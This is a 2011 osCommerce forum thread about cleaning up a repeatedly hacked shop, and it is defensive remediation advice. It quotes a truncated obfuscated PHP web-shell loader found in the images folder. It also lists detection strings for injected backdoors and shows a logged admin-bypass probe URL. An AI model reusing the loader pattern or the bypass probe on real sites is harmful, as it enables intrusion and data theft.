germ Posted March 26, 2011 Share Posted March 26, 2011 You are sadly mistaken, Sir. :blush: If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
♥FWR Media Posted March 26, 2011 Share Posted March 26, 2011 You are sadly mistaken, Sir. :blush: He is not mistaken actuallly. Ultimate SEO Urls 5 PRO - Multi Language Modern, Powerful SEO Urls KissMT Dynamic SEO Meta & Canonical Header Tags KissER Error Handling and Debugging KissIT Image Thumbnailer Security Pro - Querystring protection against hackers ( a KISS contribution ) If you found my post useful please click the "Like This" button to the right. Please only PM me for paid work. Link to comment Share on other sites More sharing options...
qwertyjjj Posted March 26, 2011 Author Share Posted March 26, 2011 He is not mistaken actuallly. It is protected behind the webserver and in the public folder so the only way in would be through a webpage hack..? Link to comment Share on other sites More sharing options...
Taipo Posted March 26, 2011 Share Posted March 26, 2011 Well, it reports these but it even reports its own files as positives so I'm not sure of the results. I checked the cookie_usage files and mail.php and these are all oscommerce defaults. Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/AV/grep.php (Known automated hack <=> error_reporting(0) ) on line: 44 Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/AV/index.php (Known automated hack <=> error_reporting(0) ) on line: 11 ........... File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/includes/languages/german/cookie_usage.php (Known filename threat) File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/includes/languages/english/cookie_usage.php (Known filename threat) I would sugges that you take some time to read this: http://www.oscommerce.com/forums/topic/372970-malware-cookie-usagephp-explained/ and http://www.oscommerce.com/forums/topic/373047-a-chat-about-file-permissions/ There are a couple of speels I wrote on file infections and does cover some issues around file permissions. The question you then need to answer for yourself, which is also discussed in those two posts, is which method of server configuration does your server sit on. My guess is that it is method 2 since so many files that have what would normally be expected to be read only permissions, have been affected. If method two then approaching this from a write-able perspective is probably the wrong approach. No matter which method is being employed on your server, you will need to remove ALL of the offending code that is either resident in uploaded files or has been appended into currect Oscommerce files. You will need to either restore your site with a version that does not have infected files, or start with a new version of the oscommerce script altogether if you do not have a safe backup to use. Then apply all the security fixes before putting it back online. - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX Link to comment Share on other sites More sharing options...
qwertyjjj Posted March 27, 2011 Author Share Posted March 27, 2011 I would sugges that you take some time to read this: http://www.oscommerce.com/forums/topic/372970-malware-cookie-usagephp-explained/ and http://www.oscommerce.com/forums/topic/373047-a-chat-about-file-permissions/ There are a couple of speels I wrote on file infections and does cover some issues around file permissions. The question you then need to answer for yourself, which is also discussed in those two posts, is which method of server configuration does your server sit on. My guess is that it is method 2 since so many files that have what would normally be expected to be read only permissions, have been affected. If method two then approaching this from a write-able perspective is probably the wrong approach. No matter which method is being employed on your server, you will need to remove ALL of the offending code that is either resident in uploaded files or has been appended into currect Oscommerce files. You will need to either restore your site with a version that does not have infected files, or start with a new version of the oscommerce script altogether if you do not have a safe backup to use. Then apply all the security fixes before putting it back online. Err...none of those files listed are infected. They just have the eval function in them, that's all. Link to comment Share on other sites More sharing options...
Taipo Posted March 27, 2011 Share Posted March 27, 2011 Err...none of those files listed are infected.They just have the eval function in them, that's all. That is the point. You need to go through your files and rid them of the virus code (where your test rendered 'Possible Infection'), but that does not get rid of the method in which the code was installed. If you see that eval code in your files, or similar code, then it is by that code that the attackers are able to install the virus code, and you would be doing yourself a big favor by restoring an original of those files rather than leaving them on your server. Some of the eval code in itself decodes to be virus importers. The eval function you mentioned, IS the virus. In general though if they are not obsfuscated virus code themselves, they are a backdoor system that allows an attacker to install pretty much whatever they so desire onto your site, in this case they have planted javascript iframes probably into other files. Hope that makes sense. - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX Link to comment Share on other sites More sharing options...
qwertyjjj Posted March 27, 2011 Author Share Posted March 27, 2011 That is the point. You need to go through your files and rid them of the virus code (where your test rendered 'Possible Infection'), but that does not get rid of the method in which the code was installed. If you see that eval code in your files, or similar code, then it is by that code that the attackers are able to install the virus code, and you would be doing yourself a big favor by restoring an original of those files rather than leaving them on your server. Some of the eval code in itself decodes to be virus importers. The eval function you mentioned, IS the virus. In general though if they are not obsfuscated virus code themselves, they are a backdoor system that allows an attacker to install pretty much whatever they so desire onto your site, in this case they have planted javascript iframes probably into other files. Hope that makes sense. All the eval code is native to oscommerce though?! eg Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/includes/functions/general.php (Known automated hack <=> eval( ) on line: 482 $statecomma = ''; $streets = $street; if ($suburb != '') $streets = $street . $cr . $suburb; if ($state != '') $statecomma = $state . ', '; $fmt = $address_format['format']; eval("\$address = \"$fmt\";"); or Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/functions/header_tags.php (Known automated hack <=> eval( ) on line: 876 function SortFileList($data, $keys) { // List As Columns foreach ($data as $key => $row) { foreach ($keys as $k) { $cols[$k['key']][$key] = $row[$k['key']]; } } // List original keys $idkeys=array_keys($data); // Sort Expression $i=0; $sort = '(array)'; foreach ($keys as $k){ if($i>0){$sort.=',';} $sort.='$cols['.$k['key'].']'; if($k['sort']){$sort.=',SORT_'.strtoupper($k['sort']);} if($k['type']){$sort.=',SORT_'.strtoupper($k['type']);} $i++; } $sort.=',$idkeys'; $sort='array_multisort('.$sort.');'; // Sort Funct eval($sort); foreach($idkeys as $idkey){ // Rebuild Full Array $result[$idkey]=$data[$idkey]; } return $result; } Link to comment Share on other sites More sharing options...
Taipo Posted March 27, 2011 Share Posted March 27, 2011 Sorry, I haven't used the Virus Threat scan, but hopefully you can custom design the searches? What you need to be looking for are strings that begin as follows: 1/ eval(base64_decode... (in fact anything with base64_decode in it) 2/ if(@$_REQUEST['cookies']==1){ The point being is, there are usually two types of files on infected websites, one is the code that acts like a file manager, which it seems you found already in your images directory, and the other is often a backdoor code that allows an attacker to upload further files should you patch the admin bypass exploit that is resident in early versions of Oscommerce. The backdoor code acts as a file uploader and file permissions changer. If you have been through your files and have not found any of those, then all the attacker has done is uploaded the filemananger/shell code into your images folder. So that is the other question, have you patched the admin bypass exploit? - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX Link to comment Share on other sites More sharing options...
qwertyjjj Posted March 27, 2011 Author Share Posted March 27, 2011 Sorry, I haven't used the Virus Threat scan, but hopefully you can custom design the searches? What you need to be looking for are strings that begin as follows: 1/ eval(base64_decode... (in fact anything with base64_decode in it) 2/ if(@$_REQUEST['cookies']==1){ The point being is, there are usually two types of files on infected websites, one is the code that acts like a file manager, which it seems you found already in your images directory, and the other is often a backdoor code that allows an attacker to upload further files should you patch the admin bypass exploit that is resident in early versions of Oscommerce. The backdoor code acts as a file uploader and file permissions changer. If you have been through your files and have not found any of those, then all the attacker has done is uploaded the filemananger/shell code into your images folder. So that is the other question, have you patched the admin bypass exploit? No files have those keywords in cookies or base64_decode. I am not sure I have made any admin bypass scripts but my admin folder is protected by htaccess IP address limitation so I guess it is about 99% protected. What is the admin bypass correction? Link to comment Share on other sites More sharing options...
Taipo Posted March 27, 2011 Share Posted March 27, 2011 Patching the $PHP_SELF code in both application_top.php files. So far I have found all amount of files that have been uploaded to attacked websites. Some of them are even as brazen as to just be an upload code that is not obsfuscated by base64 code. The main point of all of this is, if you have cleaned up your site, added the security patches, and files are still being overwritten, then there is probably a high chance you missed one of these files somewhere. The question I pose then in that scenario is, would it not be better to build a new site using 2.3.1 of oscommerce and import your products and customer database into the new store? If its a matter of time and energy, it seems to me to be about equal in the final analysis. If you haven't already, have a look at the contrib I wrote in my signature, as a part of the fix it has the patched PHP_SELF code in it. - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX Link to comment Share on other sites More sharing options...
qwertyjjj Posted April 21, 2011 Author Share Posted April 21, 2011 I have today found another file in the images folder called tebs.php with the following code: <?php $language = 'eng'; $auth = 0; $name = ''; // md5 Login $pass = ''; // md5 Password /**************************************************************************************************************************************************************/ error_reporting(0); $rhs="7P14s6NLkiCKfr5uFv8hOqbOcdZEaQISkkNySJ3m/RAgQAKBpuekViABEhJtI3Z57mK/7gs99t4R0dUz03Tsmp2Mqp2I9fDly5e7L2pfD/5nyH7fWdfzL3/78kiMBNnTPfHrYp8//QnS19N8ZtoXmJUdj9u/Q0d8nc33+T7+tdynpEdpXBe/H47T/RFX/fRKfP37X7P5NPn750J/PebHb/73n35a58f55vzzSno0ZX7XBsPR1z//+tOXf/7y069/urf+60J/perSQ+1jvBbzL8fraf63r8f55VXFh8NKyJiVyfWX42cGmf/ty6LcHP9sMV3nxfUv5/k+mWGmv5G0UH6b/6W3vfwWl1K5/8t/Esm/33PTa5Xuy9Mm+ed7U4v8++3Lf//86QG0ypNw9heGpv+P377Myn0y338ofEKsy9Hb4xdze3wWJWv/5UMWbEVQWr78t2Ka/fKfdZph0/Ri723wUixC+3y+/2/Pq3sO6QeH4O8o9Mi/j4gp5N8z9d4DwIz+EXOv+sVne5j/5fHjt+00VvJaV/rVgtpA1nAeQot/nhZsuvnLOkKSb/4bZ4z/i5liSb984f8S5If8OId+fmz07o7l/wcH7p+TbFzup8e83Pzly6bczAlM+F835QMA/nzB+Dfq [b][i]...goes on for about 100 lines like this with random letters[/i][/b] eval(gzinflate(str_rot13(base64_decode($rhs)))); ?> No idea how it got there but no other files are reported as changed by Sitemonitor. My admin folde ris locked down by IP range with an htaccess file so there's no way they could have got in through the admin folder/files. Any ideas what to check? Virus scan shows these files but they all seem normal oscommerce code: Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/AV/grep.php (Known automated hack <=> error_reporting(0) ) on line: 44 Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/AV/index.php (Known automated hack <=> error_reporting(0) ) on line: 11 Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/configuration.php (Known automated hack <=> eval( ) on line: 125 Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/sitemonitor_configure_0.php (Known Hacker <=> Assel ) on line: 21 Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/sitemonitor_configure_0.php (Known automated hack <=> eval( ) on line: 21 Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/sitemonitor_configure_0.php (Known automated hack <=> gzdecode ) on line: 21 Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/sitemonitor_configure_0.php (Known automated hack <=> iframe) on line: 21 Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/sitemonitor_configure_0.php (Known automated hack <=> error_reporting(0) ) on line: 21 Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/sitemonitor_configure_0.php (Known automated hack <=> shell_exec ) on line: 21 Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/modules.php (Known automated hack <=> eval( ) on line: 218 Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/javascript/spiffyCal/spiffyCal_v2_1.js (Known automated hack <=> eval( ) on line: 76 Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/javascript/calendarcode.js (Known automated hack <=> eval( ) on line: 57 Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/functions/general.php (Known automated hack <=> eval( ) on line: 405 Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/functions/sitemonitor_functions.php (Known Hacker <=> Assel ) on line: 381 Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/functions/sitemonitor_functions.php (Known automated hack <=> eval( ) on line: 381 Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/functions/sitemonitor_functions.php (Known automated hack <=> gzdecode ) on line: 381 Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/functions/sitemonitor_functions.php (Known automated hack <=> iframe) on line: 381 Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/functions/sitemonitor_functions.php (Known automated hack <=> error_reporting(0) ) on line: 381 Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/functions/sitemonitor_functions.php (Known automated hack <=> shell_exec ) on line: 381 Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/functions/header_tags.php (Known automated hack <=> eval( ) on line: 876 File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/languages/espanol/mail.php (Known filename threat) File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/languages/german/mail.php (Known filename threat) File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/languages/english/mail.php (Known filename threat) Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/modules/newsletters/product_notification.php (Known automated hack <=> eval( ) on line: 61 File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/mail.php (Known filename threat) File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/cookie_usage.php (Known filename threat) Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/includes/functions/general.php (Known automated hack <=> eval( ) on line: 482 Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/includes/functions/compatibility.php (Known automated hack <=> eval( ) on line: 84 File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/includes/languages/espanol/cookie_usage.php (Known filename threat) File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/includes/languages/german/cookie_usage.php (Known filename threat) File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/includes/languages/english/cookie_usage.php (Known filename threat) Link to comment Share on other sites More sharing options...
Taipo Posted April 21, 2011 Share Posted April 21, 2011 It looks to me like there are still a number of files on your system that still have rogue code appended in them which is allowing attackers to upload more files to your site, files which are in fact filemanagers. Until you find them all, this will not go away. Even using htaccess in directories will not protect you in some server configurations, when there is code that has been inserted into your files that allow for an attacker to upload files and write/append into files....that big long string that you shortened, decodes to allow them to do that. There WILL be code in other files that allows them to place files like that into directories like the images directory. There is no easy answer, the decision is yours which is 'easier'. 1. go through every file and match the code to the original file set code, or 2. build a new site in the latest 2.3.1 code and remove the old site, replacing it with the new code (rather than overwriting which can still leave rogue code resident in rogue files). If you consider the fact that your site has been hacked and rehacked since mid march, and the amount of time and stress you have put into plugging up the holes, you may want to consider the second option, which while being a right pain in the proverbial to do, is at least, all over and done with in a week. - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX Link to comment Share on other sites More sharing options...
Taipo Posted April 21, 2011 Share Posted April 21, 2011 How is the images folder open to hacking? I have put this in now: <FilesMatch "\.(php([0-9]|s)?|s?p?html|cgi|pl|exe)$"> Order Deny,Allow Deny from all </FilesMatch> Simply put, if your site is hosted on a server configuration where PHP has owner permissions....then....in that instance: Example 1: A rogue PHP script that has been appended into one of the sites files, can be configured to rename your htaccess file to something else, complete its business, then rename the htaccess back to its original name. Example 2: A rogue PHP script that has been appended into one of the sites files, can add a file into any directory no matter what the permissions are since PHP itself has owner permissions. Example 3: A rogue PHP script that has been appended into one of the sites files, can be used to read the contents of the file and directory listing and find the renamed admin directory, the htaccess in it then renamed, and the admin bypass exploit (which is almost never patched by users who are advised to hide their admin directories and/or protect them using htaccess) used to give the attacker full access to your admin section where they add themselves again as an administrator and access all your files. The same appended code is used to read the config file and get the database user and password, and with all of that they can then have a party at your expense....so to speak. Lastly if they want to be nice about it, they return the htaccess to its former name and return any file and directory permissions to their original settings. Meanwhile this issue was patched last year in Oscommerce 2.3.1 => that really is the best place to start. - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX Link to comment Share on other sites More sharing options...
qwertyjjj Posted April 22, 2011 Author Share Posted April 22, 2011 It looks to me like there are still a number of files on your system that still have rogue code appended in them which is allowing attackers to upload more files to your site, files which are in fact filemanagers. Until you find them all, this will not go away. Even using htaccess in directories will not protect you in some server configurations, when there is code that has been inserted into your files that allow for an attacker to upload files and write/append into files....that big long string that you shortened, decodes to allow them to do that. There WILL be code in other files that allows them to place files like that into directories like the images directory. There is no easy answer, the decision is yours which is 'easier'. 1. go through every file and match the code to the original file set code, or 2. build a new site in the latest 2.3.1 code and remove the old site, replacing it with the new code (rather than overwriting which can still leave rogue code resident in rogue files). If you consider the fact that your site has been hacked and rehacked since mid march, and the amount of time and stress you have put into plugging up the holes, you may want to consider the second option, which while being a right pain in the proverbial to do, is at least, all over and done with in a week. All the files I listed above that have eval in them are the oscommerce files aren't they that also use eval code. I have some of my own code in some oscommerce files, which is going to cause difficulties. If I upgrade (I have 2.2RC1), then how can I put customised code back in the correct places? I suppose it is possible that my oscommerce site isn't the issue and that another of mysites has allowed a hacker to post php code but it only ever gets placed in the image folder. Link to comment Share on other sites More sharing options...
Taipo Posted April 22, 2011 Share Posted April 22, 2011 All the files I listed above that have eval in them are the oscommerce files aren't they that also use eval code. If you are experiencing attacks where files are being uploaded into the images directory, then you have to assume that there is another file or files in your web directory somewhere that is either a rogue file or a stock site file that has been added to which allows for at least file uploading. The eval() function in conjuction with base64_decode is just one method used by attackers when adding code to site files, some times their appended code is not obfuscated at all and is in plain view, as in what that string would look like decoded. Have you patched the admin bypass exploit hole in 2.2RC1? and in asking that I dont mean, "have you hidden the security hole like changing the admin directory name", I am meaning have you patched as in replaced the faulty code? I suppose it is possible that my oscommerce site isn't the issue and that another of mysites has allowed a hacker to post php code but it only ever gets placed in the image folder. Do you have logging enabled? If so you should be able to find the POST request in the logs that resulted in the file being uploaded. That may yield you some info about where the file upload is coming from. I would assume that the image directory permissions are 777 on your server where 755 is a read only setting? (this differs in some server configurations). Generally, as in 99% of the time, the placing of rogue filemanagers into your images directory is an automated event by spam servers that are programmed to seed those types of shell files as far and wide as they can into as many website files as possible. What this means is that it is more likely that they have exploited either the admin bypass exploit (which is patched in 2.3.1) or are exploiting another file that has been adjusted in your site rather than traversing in from another virtualhost on the same server. The effort it would take to traverse into your site is significant and not at all in character with what I have seen of this genre of attacks. Although in saying that I have no clue as to the way you have configured your site, but just saying this on the face of the info you have provided so far. I have some of my own code in some oscommerce files, which is going to cause difficulties. If I upgrade (I have 2.2RC1), then how can I put customised code back in the correct places? If that is your priority then stick with 2.2RC1 however the best practice with any content management or open source script is to upgrade when the development team release a security update. Many of these types of attacks are completely dependent on the fact that most people do not upgrade. Transversely these attacks would disappear from the map if people updated their scripts when a security release came out. - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX Link to comment Share on other sites More sharing options...
qwertyjjj Posted April 22, 2011 Author Share Posted April 22, 2011 If you are experiencing attacks where files are being uploaded into the images directory, then you have to assume that there is another file or files in your web directory somewhere that is either a rogue file or a stock site file that has been added to which allows for at least file uploading. The eval() function in conjuction with base64_decode is just one method used by attackers when adding code to site files, some times their appended code is not obfuscated at all and is in plain view, as in what that string would look like decoded. Have you patched the admin bypass exploit hole in 2.2RC1? and in asking that I dont mean, "have you hidden the security hole like changing the admin directory name", I am meaning have you patched as in replaced the faulty code? Do you have logging enabled? If so you should be able to find the POST request in the logs that resulted in the file being uploaded. That may yield you some info about where the file upload is coming from. I would assume that the image directory permissions are 777 on your server where 755 is a read only setting? (this differs in some server configurations). Generally, as in 99% of the time, the placing of rogue filemanagers into your images directory is an automated event by spam servers that are programmed to seed those types of shell files as far and wide as they can into as many website files as possible. What this means is that it is more likely that they have exploited either the admin bypass exploit (which is patched in 2.3.1) or are exploiting another file that has been adjusted in your site rather than traversing in from another virtualhost on the same server. The effort it would take to traverse into your site is significant and not at all in character with what I have seen of this genre of attacks. Although in saying that I have no clue as to the way you have configured your site, but just saying this on the face of the info you have provided so far. If that is your priority then stick with 2.2RC1 however the best practice with any content management or open source script is to upgrade when the development team release a security update. Many of these types of attacks are completely dependent on the fact that most people do not upgrade. Transversely these attacks would disappear from the map if people updated their scripts when a security release came out. admin bypass exploit hole in 2.2RC1 Is this the bypass in the filemanager php file where you used to be able to upload and edit files? I deleted that file a while back. My admin folder (now renamed) has a htaccess only allowing certain IP addresses, unless they know which IP address then it's unlikely they're getting in through the admin folder. Again, it's possible they know the IP ranges but the fact I have it locked down like this and the fact that the hacker is probably getting in through an automated script rather than targeted specifically at me makes the chances of this less. Do you know a good file comparison software (free) that I could check the current site and also the default oscommerce site? I checked all the files with eval, base64, or system and all the code seems "normal" oscommerce functions. Link to comment Share on other sites More sharing options...
Taipo Posted April 22, 2011 Share Posted April 22, 2011 admin bypass exploit hole in 2.2RC1 Is this the bypass in the filemanager php file where you used to be able to upload and edit files? I deleted that file a while back. No, and I doubt that there ever was an issue with the filemanager. The issue has always been with the $PHP_SELF code in 2.2.1 and earlier which allowed attackers to append login.php to admin filenames which bypassed the admin permissions. Since filemanager was one of the few files in the admin section that could actually change site files, I think the assumption became that this was the file at fault. The other faulty file was the earlier rendition of FCKEditor which has now been patched. I have included the patch for the admin bypass exploit in the contribution I wrote called osc_sec (see link in my signature). Try installing that addon and see if it also helps you out. At the least it will patch that issue which is the root cause of everything you are experiencing to date. My admin folder (now renamed) has a htaccess only allowing certain IP addresses, unless they know which IP address then it's unlikely they're getting in through the admin folder. Unless you are using the <LIMITEXCEPT> directive further up your htaccess, it is relatively trivial for an attacker to bypass an allow from xxx.xxx.xxx.xxx code written into the <LIMIT> directive in htaccess. <LimitExcept GET POST HEAD> Deny from all </LimitExcept> Put that in the very top of your htaccess and it will help secure your attempt to only allow from specific IP addresses. This will prevent anyone sending a request to your server unless it is a GET POST or HEAD request. That in conjuction with the... <Limit GET POST> order allow,deny deny from all allow from 111.111.111.111 (<= your IP address) </Limit> Is more secure than by itself. Do you know a good file comparison software (free) that I could check the current site and also the default oscommerce site? No I dont sorry. I checked all the files with eval, base64, or system and all the code seems "normal" oscommerce functions. These are the most common codes, but they are not the only ones I have seen. The fact that you now have another shell code in your images directory tells me there is appended code in one of your files which allows for at least file uploading and possibly file and directory permissions testing. Now that there has been a shell code added into your images directory, you should assume then that it was also possible for an attacker to use that newly added file to make changes to files in your website. At the very least these rogue filemanager type shell files can be used to 'read' the content of files, for instance the configure.php file, which would allow them to get a copy of your databases user and password stored in there. Some of the appended code is also javascript, IFRAMEs, straight PHP upload code with no hiding behind base64, and there is also upload code that has been split over several files, and more. - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX Link to comment Share on other sites More sharing options...
qwertyjjj Posted April 22, 2011 Author Share Posted April 22, 2011 like this? <LimitExcept GET POST HEAD> Deny from all </LimitExcept> <Limit GET POST> order allow,deny deny from all Allow from xx.xx.x.x/11 </Limit> That seems to block me completely. Link to comment Share on other sites More sharing options...
qwertyjjj Posted April 22, 2011 Author Share Posted April 22, 2011 Now that there has been a shell code added into your images directory, you should assume then that it was also possible for an attacker to use that newly added file to make changes to files in your website. At the very least these rogue filemanager type shell files can be used to 'read' the content of files, for instance the configure.php file, which would allow them to get a copy of your databases user and password stored in there. SiteMon didn't show any other file or date changes within the site, so a file was uploaded to images but that was all. like this? <LimitExcept GET POST HEAD> Deny from all </LimitExcept> <Limit GET POST> order allow,deny deny from all Allow from xx.xx.x.x/11 </Limit> That seems to block me completely. Link to comment Share on other sites More sharing options...
qwertyjjj Posted April 22, 2011 Author Share Posted April 22, 2011 I just received this, does it mean everything is ok? This IP [ 70.32.97.156 ] has been htaccess banned on the http://www.mysite.co.uk website by osc_sec.php version 2.4.[r6] REASON FOR BAN: Exploit attempt using blacklisted request string: .php/login.php, attempted GET String Injection using blacklisted item: 'php/login', Time of ban: Sat, 23 Apr 2011 04:36:00 ######## ALL $_POST FORM VARIABLES ####### # # - No POST form data # ########################################## ######### ALL $_SERVER VARIABLES ######### # # - HOME = /home6c/sub002/sc11883-LGVN # - HTTP_TE = deflate,gzip;q=0.3 # - HTTP_CONNECTION = TE, close # - HTTP_HOST = www.mysite.co.uk # - HTTP_USER_AGENT = Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1 # - PATH = /usr/bin:/bin # - SERVER_SIGNATURE = <address>Apache Server at www.mysite.co.uk Port 80</address> # - SERVER_SOFTWARE = Apache # - SERVER_NAME = www.mysite.co.uk # - SERVER_ADDR = 10.0.12.1 # - SERVER_PORT = 80 # - REMOTE_ADDR = 70.32.97.156 # - DOCUMENT_ROOT = /home6c/sub002/sc11883-LGVN/mysite.co.uk # - SERVER_ADMIN = [no address given] # - SCRIPT_FILENAME = /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/index.php # - REMOTE_PORT = 33754 # - GATEWAY_INTERFACE = CGI/1.1 # - SERVER_PROTOCOL = HTTP/1.1 # - REQUEST_METHOD = GET # - QUERY_STRING = cPath=21/admin/file_manager.php/login.php # - REQUEST_URI = /cart/index.php?cPath=21/admin/file_manager.php/login.php # - SCRIPT_NAME = /cart/index.php # - PHP_SELF = /cart/index.php # - REQUEST_TIME = 1303490160 # - HTTP_REFERER = None # # 2 methods of setting $PHP_SELF: # - Method 1 (from latest oscommerce) reports the filename as index.php # - Method 2 (uses $phpSelf function) reports the filename as index.php # ########################################## ######### ALL $_GET VARIABLES ######### # # cPath=21/admin/file_manager.php/login.php # ########################################## OTHER INFO $oscsec_threshold=1 /home6c/sub002/sc11883-LGVN/mysite.co.uk//cart/.htaccess is htaccess writeable = 1 Resolve IP address: http://www.ipinfodb.com/ip_locator.php?ip=70.32.97.156 Search Project Honeypot: http://www.projecthoneypot.org/ip_70.32.97.156 This email was generated by Osc_Sec.php. To disable email notifications, open the osc_sec.php file, and in the Settings section change $emailenabled = 1 to $emailenabled = 0 Keep up with the latest version of osc_sec.php at http://www.oscommerce.com/community/contributions,7834 See discussions at http://www.digistore.co.nz/forum/viewtopic.php?id=2304 or email [email protected] with any suggestions. Link to comment Share on other sites More sharing options...
Taipo Posted April 22, 2011 Share Posted April 22, 2011 SiteMon didn't show any other file or date changes within the site, so a file was uploaded to images but that was all. Unless the attacker was able to find your admin directory, or able to bypass the htaccess blocking in the way I described, the other option is that there is a piece of appended code in one of your site files that must have been resident there before you installed SiteMon? (assuming that SiteMon is doing its job correctly) like this? <LimitExcept GET POST HEAD> Deny from all </LimitExcept> <Limit GET POST> order allow,deny deny from all Allow from xx.xx.x.x/11 </Limit> That seems to block me completely. <LimitExcept GET POST> Deny from all </LimitExcept> <Limit GET POST> order allow,deny deny from all allow from [your_external_ip_address] </Limit> Just put your external IP address in the allow from. BTW what code were you using prior to this to allow only your IP address? - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX Link to comment Share on other sites More sharing options...
